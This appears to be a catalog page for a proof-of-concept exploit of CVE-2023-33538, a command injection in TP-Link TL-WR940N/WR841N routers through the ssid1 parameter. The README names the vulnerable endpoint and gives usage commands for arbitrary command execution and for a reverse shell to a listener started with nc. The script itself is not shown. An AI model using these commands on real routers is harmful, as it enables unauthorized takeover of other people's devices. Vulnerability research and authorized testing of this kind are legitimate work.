CVE-2023-33538 PoC — TP-Link wireless router 命令注入漏洞

Source

Associated Vulnerability

Description

Python Exploit for TP-Link TL-WR940N/TL-WR841N Command Injection Vulnerability

Readme

# Python Exploit for TP-Link TL-WR940N/TL-WR841N Command Injection Vulnerability


## Usage Instructions

1. **Basic Vulnerability Check**:
   ```
   python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
   ```

2. **Execute Custom Command**:
   ```
   python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
   ```

3. **Reverse Shell** (set up listener first with `nc -lvnp 4444`):
   ```
   python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
   ```

**Important Notes**:
- These scripts are for educational and testing purposes only
- Always get proper authorization before testing any system
- The reboot command is used as default because it's non-destructive and easily verifiable
- The reverse shell may not work on all firmware versions as it depends on available binaries
- Some firmware versions require a random path in the URL which the script attempts to detect automatically

The vulnerability exists due to improper input sanitization in the `ssid1` parameter of the `/userRpm/WlanNetworkRpm.htm` endpoint, allowing command injection through specially crafted requests.

File Snapshot

 [4.0K]  /data/pocs/1b2056b2af4bb874a0cc26e916c3ae6b92329482
├── [1.1K]  README.md
└── [4.8K]  tplink.py

0 directories, 2 files

Remarks